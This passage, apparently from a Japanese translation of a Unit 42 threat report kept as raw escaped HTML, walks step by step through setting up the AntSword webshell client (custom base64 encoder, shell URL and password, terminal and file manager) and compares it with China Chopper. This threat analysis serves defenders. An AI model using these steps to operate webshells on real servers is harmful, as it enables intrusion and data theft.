1051px) 100vw, 1051px\" \/><\/p>\n<p>6. \u65b0\u3057\u3044\u30a8\u30f3\u30b3\u30fc\u30c0\u3092\u4f5c\u6210\u5f8c\u3001\u3053\u306e\u30a8\u30f3\u30b3\u30fc\u30c0\u3092\u9078\u629e\u3057\u3001[Edit]\u30e1\u30cb\u30e5\u30fc\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1051\" height=\"551\"  class=\"wp-image-103748 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29.png 1051w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29-300x157.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29-1024x537.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29-768x403.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29-900x472.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-29-370x194.png 370w\" sizes=\"(max-width: 1051px) 100vw, 1051px\" \/><\/p>\n<p>7. [Edit]\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068[EditEncoder]\u30a6\u30a3\u30f3\u30c9\u30a6\u304c\u958b\u304d\u3001\u5909\u66f4\u53ef\u80fd\u306a\u30b5\u30f3\u30d7\u30eb\u30a8\u30f3\u30b3\u30fc\u30c0\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\u30b5\u30fc\u30d0\u30fc\u3067bitreeview.aspx webshell\u3092\u4f7f\u7528\u3059\u308b\u305f\u3081\u3001\u30b5\u30f3\u30d7\u30eb\u30a8\u30f3\u30b3\u30fc\u30c0\u306e24\u884c\u76ee\u3092\u4fee\u6b63\u3057\u3001Darr1R1ng\u30d5\u30a3\u30fc\u30eb\u30c9\u306e\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u30af\u30ea\u30a2\u30c6\u30ad\u30b9\u30c8\u306e\u307e\u307e\u306b\u3059\u308b\u4ee3\u308f\u308a\u306bbase64\u3067\u30a8\u30f3\u30b3\u30fc\u30c9\u3059\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1043\" height=\"586\"  class=\"wp-image-103750 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30.png 1043w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30-300x169.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30-1024x575.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30-768x431.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30-900x506.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-30-370x208.png 370w\" sizes=\"(max-width: 1043px) 100vw, 1043px\" \/><\/p>\n<p>8. Darr1R1ng\u30d5\u30a3\u30fc\u30eb\u30c9\u3092base64\u30a8\u30f3\u30b3\u30fc\u30c9\u3059\u308b\u305f\u3081\u3001\u653b\u6483\u8005\u306f24\u884c\u76ee\u3092\u3001\u3053\u306e\u56f3\u306e24\u884c\u76ee\u306b\u4eca\u8868\u793a\u3055\u308c\u3066\u3044\u308b\u30b3\u30fc\u30c9\u3068\u540c\u7b49\u306e\u6a5f\u80fd\u3092\u6301\u3064\u30b3\u30fc\u30c9\u306b\u5909\u66f4\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001[Save]\u30e1\u30cb\u30e5\u30fc\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u3001\u65b0\u3057\u3044\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4fdd\u5b58\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1045\" height=\"586\"  class=\"wp-image-103752 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31.png 1045w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31-300x168.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31-1024x574.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31-768x431.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31-900x505.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-31-370x207.png 370w\" sizes=\"(max-width: 1045px) 100vw, 1045px\" \/><\/p>\n<p>9. \u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u4f5c\u6210\u3057\u305f\u3089\u3001\u53f3\u30af\u30ea\u30c3\u30af\u3057\u3066[Add]\u3092\u9078\u629e\u3057\u3001Shell Manager\u306e\u30a6\u30a3\u30f3\u30c9\u30a6\u306b\u65b0\u3057\u3044\u30b7\u30a7\u30eb\u3092\u8ffd\u52a0\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1044\" height=\"586\"  class=\"wp-image-103754 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32.png 1044w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32-300x168.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32-1024x575.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32-768x431.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32-900x505.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-32-370x208.png 370w\" sizes=\"(max-width: 1044px) 100vw, 1044px\" \/><\/p>\n<p>10. [Add shell]\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u304c\u958b\u304d\u3001\u3053\u3053\u304b\u3089\u30b7\u30a7\u30eb\u306e\u5834\u6240\u3001HTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u5185\u306e\u30d5\u30a3\u30fc\u30eb\u30c9\u540d\u3001webshell\u304c\u30b7\u30a7\u30eb\u30de\u30cd\u30fc\u30b8\u30e3\u3068\u306e\u5bfe\u8a71\u306b\u4f7f\u7528\u3059\u308b\u30a8\u30f3\u30b3\u30fc\u30c9\u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u69cb\u6210\u3067\u304d\u307e\u3059\u3002<\/p>\n<p><img width=\"1045\" height=\"585\"  class=\"wp-image-103756 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33.png 1045w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33-300x168.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33-1024x573.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33-768x430.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33-900x504.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-33-370x207.png 370w\" sizes=\"(max-width: 1045px) 100vw, 1045px\" \/><\/p>\n<p>11. \u3053\u306e\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u306b\u3064\u3044\u3066\u3044\u3048\u3070\u3001\u653b\u6483\u8005\u306f\u6b21\u306e\u8a2d\u5b9a\u3092\u8ffd\u52a0\u3057\u3066[Add]\u30e1\u30cb\u30e5\u30fc\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u3044\u305f\u3082\u306e\u3068\u601d\u308f\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li>\n<ol>\n<li>[Shell url]\u306b\u300cbitreeview.aspx\u300dwebshell (\u691c\u8a3c\u74b0\u5883\u3067\u306flocalhost) \u3078\u306e URL \u3092\u8a2d\u5b9a<\/li>\n<li>[Shell pwd]\u306b\u306f\u300cDarr1R1ng\u300d\u3068\u3044\u3046\u5358\u8a9e\u3092\u8a2d\u5b9a<\/li>\n<li>[Shell type] \u306b\u30c9\u30ed\u30c3\u30d7\u30c0\u30a6\u30f3\u304b\u3089\u300cASPX\u300d\u3092\u9078\u629e<\/li>\n<li>[myencoder]\u306e\u6a2a\u306e\u30e9\u30b8\u30aa\u30dc\u30c3\u30af\u30b9\u3092\u30aa\u30f3\u306b\u3057\u3066\u30ab\u30b9\u30bf\u30e0\u30a8\u30f3\u30b3\u30fc\u30c0\u3092\u9078\u629e<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<p><img width=\"1042\" height=\"694\"  class=\"wp-image-103758 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34.png 1042w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34-1024x682.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34-768x512.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-34-370x246.png 370w\" sizes=\"(max-width: 1042px) 100vw, 1042px\" \/><\/p>\n<p>12. [Add]\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30b7\u30a7\u30eb\u304c\u30b7\u30a7\u30eb\u30de\u30cd\u30fc\u30b8\u30e3\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u5185\u306b\u4e00\u89a7\u8868\u793a\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><img width=\"1043\" height=\"694\"  class=\"wp-image-103760 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35.png 1043w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35-1024x681.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35-768x511.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-35-370x246.png 370w\" sizes=\"(max-width: 1043px) 100vw, 1043px\" \/><\/p>\n<p>13. webshell\u3068\u5bfe\u8a71\u3059\u308b\u305f\u3081\u3001\u653b\u6483\u8005\u306f\u30b7\u30a7\u30eb\u3092\u53f3\u30af\u30ea\u30c3\u30af\u3057\u3066\u8868\u793a\u3055\u308c\u308b\u30e1\u30cb\u30e5\u30fc\u304b\u3089\u30a2\u30af\u30b7\u30e7\u30f3\u3092\u9078\u629e\u3057\u307e\u3059\u3002web\u30b5\u30fc\u30d0\u30fc\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u3001Terminal\u30e1\u30cb\u30e5\u30fc\u30dc\u30bf\u30f3\u3092\u9078\u629e\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1043\" height=\"694\"  class=\"wp-image-103762 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36.png 1043w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36-1024x681.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36-768x511.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-36-370x246.png 370w\" sizes=\"(max-width: 1043px) 100vw, 1043px\" \/><\/p>\n<p>14. AntSword Shell Manager\u306f\u3001\u30b3\u30de\u30f3\u30c9\u30d7\u30ed\u30f3\u30d7\u30c8\u30a6\u30a3\u30f3\u30c9\u30a6\u306b\u4f3c\u305f\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u3092\u8868\u793a\u3057\u307e\u3059\u3002\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0\u30b7\u30b9\u30c6\u30e0\u3001\u73fe\u5728\u306e\u30e6\u30fc\u30b6\u30fc\u3001\u73fe\u5728\u306e\u4f5c\u696d\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u30b9\u30c8\u30ec\u30fc\u30b8\u30dc\u30ea\u30e5\u30fc\u30e0\u306a\u3069\u3001webshell\u304c\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u30b7\u30b9\u30c6\u30e0\u306b\u95a2\u3059\u308b\u60c5\u5831\u3082\u8868\u793a\u3055\u307e\u308c\u307e\u3059\u3002<\/p>\n<p><img width=\"1042\" height=\"694\"  class=\"wp-image-103764 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37.png 1042w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37-1024x682.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37-768x512.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-37-370x246.png 370w\" sizes=\"(max-width: 1042px) 100vw, 1042px\" \/><\/p>\n<p>15. \u653b\u6483\u8005\u306f\u3053\u306e\u30a6\u30a3\u30f3\u30c9\u30a6\u3067\u76ee\u7684\u306e\u30b3\u30de\u30f3\u30c9\u3092\u767a\u884c\u3057\u3001webshell\u304c\u305d\u308c\u3092\u5b9f\u884c\u3057\u3066\u7d50\u679c\u3092\u8fd4\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1042\" height=\"694\"  class=\"wp-image-103766 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38.png 1042w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38-1024x682.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38-768x512.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-38-370x246.png 370w\" sizes=\"(max-width: 1042px) 100vw, 1042px\" \/><\/p>\n<p>16. \u4fb5\u5bb3\u3055\u308c\u305f\u30b5\u30fc\u30d0\u30fc\u306e\u30d5\u30a1\u30a4\u30eb\u30b7\u30b9\u30c6\u30e0\u3068\u76f4\u63a5\u3084\u308a\u53d6\u308a\u3057\u305f\u3044\u5834\u5408\u3001Shell Manager\u304b\u3089[FileManager]\u30e1\u30cb\u30e5\u30fc\u30dc\u30bf\u30f3\u3092\u9078\u629e\u3057\u307e\u3059\u3002<\/p>\n<p><img width=\"1043\" height=\"694\"  class=\"wp-image-103768 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39.png\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39.png 1043w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39-300x200.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39-1024x681.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39-768x511.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39-900x599.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/word-image-39-370x246.png 370w\" sizes=\"(max-width: 1043px) 100vw, 1043px\" \/><\/p>\n<h3><a id=\"post-103727-antsword-similarity-to-china-chopper\"><\/a>Ant Cword\u3068China Chopper\u3068\u306e\u985e\u4f3c\u6027<\/h3>\n<p>AntSword\u3068China Chopper\u306f\u3069\u3061\u3089\u3082\u30e2\u30b8\u30e5\u30e9\u30fc\u578b\u306ewebshell\u3067\u3001\u653b\u6483\u8005\u306f\u3053\u308c\u3089\u306ewebshell\u3068\u3001web\u30d6\u30e9\u30a6\u30b6\u7d4c\u7531\u3067\u306f\u306a\u304f\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u7d4c\u7531\u3067\u5bfe\u8a71\u3057\u307e\u3059\u3002AntSword\u306e\u958b\u767a\u8005\u306f\u3001\u30c4\u30fc\u30eb\u306e\u30d9\u30fc\u30b9\u306bChina Chopper\u3092\u4f7f\u7528\u3057\u3066\u3044\u305f\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u3068\u3044\u3046\u306e\u3082\u3001\u30c7\u30d5\u30a9\u30eb\u30c8\u306eChina Chopper webshell\u306f\u3001AntSword\u306eASPX webshell\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u30a8\u30f3\u30b3\u30fc\u30c0\u3068\u9023\u643a\u3059\u308b\u304b\u3089\u3067\u3059\u30022\u3064\u306ewebshell\u306e\u4e3b\u306a\u9055\u3044\u306f\u30012\u3064\u306e\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u304c\u30b3\u30de\u30f3\u30c9\u305d\u306e\u4ed6\u306e\u6d3b\u52d5\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306bwebshell\u306b\u9001\u4fe1\u3059\u308b\u30b3\u30fc\u30c9\u3084\u30d1\u30e9\u30e1\u30fc\u30bf\u306b\u95a2\u3059\u308b\u3082\u306e\u3067\u3059\u3002\u305f\u3068\u3048\u3070China Chopper\u306e\u5834\u5408\u3001webshell\u3092\u4ecb\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u306e\u306b2\u3064\u306e\u30d1\u30e9\u30e1\u30fc\u30bfz1\u3068z2\u3092\u4f7f\u7528\u3057\u307e\u3059\uff08\u56f35\u3092\u53c2\u7167\uff09\u304c\u3001AntSword\u306f\u3001\u5b9f\u884c\u3054\u3068\u306b\u30e9\u30f3\u30c0\u30e0\u306b\u751f\u6210\u3055\u308c\u305f4\u3064\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u540d\u3092\u4f7f\u7528\u3057\u307e\u3059\uff08\u56f36\u53c2\u7167\uff09\u3002<\/p>\n<p><img width=\"912\" height=\"350\"  class=\"wp-image-103770 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-5-http-post-request-to-china-chopper-webshe.png\" alt=\"Figure 5 HTTP POST request to China Chopper webshell to run a command with arrows pointing to its required parameters\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-5-http-post-request-to-china-chopper-webshe.png 912w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-5-http-post-request-to-china-chopper-webshe-300x115.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-5-http-post-request-to-china-chopper-webshe-768x295.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-5-http-post-request-to-china-chopper-webshe-900x345.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-5-http-post-request-to-china-chopper-webshe-370x142.png 370w\" sizes=\"(max-width: 912px) 100vw, 912px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f35 \u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3055\u3044\u306eChina Chopper webshell\u3078\u306eHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u3002\u3053\u3053\u3067\u306f\u5fc5\u8981\u3068\u3055\u308c\u308b\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u77e2\u5370\u3067\u793a\u3057\u3066\u3044\u308b<\/span><\/p>\n<p><img width=\"903\" height=\"473\"  class=\"wp-image-103772 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-6-http-post-request-to-antsword-webshell-to.png\" alt=\"Figure 6 HTTP POST request to AntSword webshell to run a command with arrows pointing to its required parameters\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-6-http-post-request-to-antsword-webshell-to.png 903w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-6-http-post-request-to-antsword-webshell-to-300x157.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-6-http-post-request-to-antsword-webshell-to-768x402.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-6-http-post-request-to-antsword-webshell-to-900x471.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-6-http-post-request-to-antsword-webshell-to-370x194.png 370w\" sizes=\"(max-width: 903px) 100vw, 903px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f36 \u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3055\u3044\u306eAntSword webshell\u3078\u306eHTTP POST\u30ea\u30af\u30a8\u30b9\u30c8\u3002\u3053\u3053\u3067\u306f\u5fc5\u8981\u3068\u3055\u308c\u308b\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u77e2\u5370\u3067\u793a\u3057\u3066\u3044\u308b<\/span><\/p>\n<p>\u30d1\u30e9\u30e1\u30fc\u30bf\u304c\u7570\u306a\u308b\u3060\u3051\u3067\u306a\u304f\u3001webshell\u306b\u9001\u4fe1\u3055\u308c\u308b\u30b3\u30fc\u30c9\u3082\u9055\u3044\u307e\u3059\u3002\u56f37\u306e\u53f3\u5074\u306e\u30b3\u30fc\u30c9\u304cAntSword\u306e\u3082\u306e\u3067\u3059\u304c\u3001\u3053\u3053\u304b\u3089\u308f\u304b\u308b\u3088\u3046\u306b\u3001AntSword\u3068China Chopper\u304cwebshell\u3067\u306e\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u306b\u4f7f\u7528\u3059\u308b\u30b3\u30fc\u30c9\u3092\u6bd4\u8f03\u3059\u308b\u3068\u3001\u307e\u3063\u305f\u304f\u540c\u3058\u30b3\u30fc\u30c9\u884c\u3082\u3042\u308a\u307e\u3059\u304c\u3001\u53f3\u5074\u306eAntSword\u306e\u30b3\u30fc\u30c9\u306b\u306f\u7570\u306a\u308b\u30b3\u30fc\u30c9\u884c\u3084\u8ffd\u52a0\u3055\u308c\u305f\u884c\u304c\u8907\u6570\u3042\u308a\u307e\u3059\u3002\u3053\u3053\u3067\u306f\u3001\u30b3\u30de\u30f3\u30c9\u5b9f\u884c\u524d\u306b\u653b\u6483\u8005\u304c\u74b0\u5883\u5909\u6570\u3092\u8a2d\u5b9a\u3067\u304d\u308b\u3088\u3046\u306b\u3059\u308b\u8ffd\u52a0\u30b3\u30fc\u30c9\u884c\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><img width=\"1024\" height=\"337\"  class=\"wp-image-103774 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-7-comparison-between-code-used-by-antsword.png\" alt=\"Figure 7 Comparison between code used by AntSword and China Chopper to run a command on the webshell\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-7-comparison-between-code-used-by-antsword.png 1024w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-7-comparison-between-code-used-by-antsword-300x99.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-7-comparison-between-code-used-by-antsword-768x253.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-7-comparison-between-code-used-by-antsword-900x296.png 900w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/02\/figure-7-comparison-between-code-used-by-antsword-370x122.png 370w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 10pt;\">\u56f37 webshell\u3067\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306bAntSword\u3068China Chopper\u304c\u4f7f\u7528\u3059\u308b\u30b3\u30fc\u30c9\u306e\u6bd4\u8f03<\/span><\/p>\n<h3><a id=\"post-103727-tools-seen-in-related-webshell\"><\/a>\u95a2\u9023\u3059\u308bwebshell\u3067\u78ba\u8a8d\u3055\u308c\u305f\u30c4\u30fc\u30eb<\/h3>\n<p>AntSword webshell\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u305f\u30c4\u30fc\u30eb\u3092\u5206\u6790\u3059\u308b\u3068\u3001\u7570\u306a\u308b\u4e2d\u6771\u306e\u56fd\u306e\u7570\u306a\u308b\u653f\u5e9c\u6a5f\u95a2\u306e\u30b5\u30fc\u30d0\u30fc\u306b\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3055\u308c\u3066\u3044\u308bwebshell\u306b\u3001\u540c\u4e00\u306eMimikatz\u30b5\u30f3\u30d7\u30eb\u304c\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3057\u305f\u30022019\u5e749\u670819\u65e5\u3001\u653b\u6483\u8005\u306f\u3053\u306eMimikatz\u30b5\u30f3\u30d7\u30eb\u3092\u6b21\u306eURL\u3067\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3055\u308c\u3066\u3044\u308bwebshell\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, 